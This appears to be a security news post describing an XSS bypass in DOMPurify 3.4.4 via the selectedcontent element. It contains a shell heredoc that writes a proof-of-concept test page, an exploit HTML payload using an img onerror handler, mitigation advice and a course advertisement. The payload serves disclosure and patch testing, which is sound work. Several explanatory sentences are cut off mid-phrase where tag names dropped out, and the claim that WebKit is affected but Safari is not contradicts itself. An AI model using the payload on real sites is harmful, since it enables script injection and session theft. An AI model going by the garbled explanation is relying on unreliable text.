Listen to this Post
The vulnerability arises from the interaction between the browser’s handling of the `
When DOMPurify 3.4.4 receives an HTML string containing a `
DailyCVE Form:
DailyCVE Form: Platform: Browser (Chromium/WebKit) Version: 3.4.4 Vulnerability : XSS bypass Severity: Medium date: 2026-05-19 Prediction: 2026-05-26
What Undercode Say
The vulnerability can be observed by running the following test script in a Chromium‑based browser or WebKit environment. It logs the “sanitised” HTML and then attempts to inject it into the DOM, triggering the XSS payload.
Test script for DOMPurify 3.4.4 selectedcontent bypass cat << 'EOF' > test_dompurify.html <!DOCTYPE html> <html> <head> <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/purify.min.js"></script> </head> <body> <script> const dirty = '<select><button><selectedcontent></selectedcontent></button>' + '<option selected=javascript:1>' + '<img src=x onerror=alert(1)>x' + '</option></select>'; // Sanitize with DOMPurify 3.4.4 const clean = DOMPurify.sanitize(dirty); console.log("Sanitized output:", clean); // Insert the returned string into the document document.body.innerHTML = clean; </script> </body> </html> EOF echo "Test file created. Open test_dompurify.html in Chromium or WebKit."
Exploit
The attacker supplies the following malicious HTML fragment:
<select> <button> <selectedcontent></selectedcontent> </button> <option selected=javascript:1> <img src=x onerror=alert(1)>x </option> </select>
Because DOMPurify 3.4.4 includes `
Protection
- Upgrade to DOMPurify 3.4.5 or later, which fixes this bypass.
- As a temporary workaround, remove `
` from the allow‑list by using a custom `ALLOWED_TAGS` configuration. - Always sanitise and insert the resulting HTML in a single step; avoid parsing the returned string again in a different context.
- Apply additional output encoding (e.g. HTML entity encoding) when displaying user‑provided HTML.
Impact
- Confidentiality – The attacker can execute arbitrary JavaScript in the context of the vulnerable website, potentially stealing session cookies, reading local storage, or accessing sensitive data.
- Integrity – The attacker can modify the page content, deface the website, or perform actions on behalf of the user.
- Availability – In extreme cases, malicious scripts could disrupt the normal functioning of the application.
Applications that sanitise attacker‑controlled HTML with DOMPurify 3.4.4 (using the string‑input path) and later insert the returned string into the page are at high risk. The issue is present in Chromium and WebKit browsers, but not in Safari (at the time of publication) or Firefox. However, browser support for `` may expand in the future, potentially increasing the attack surface.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

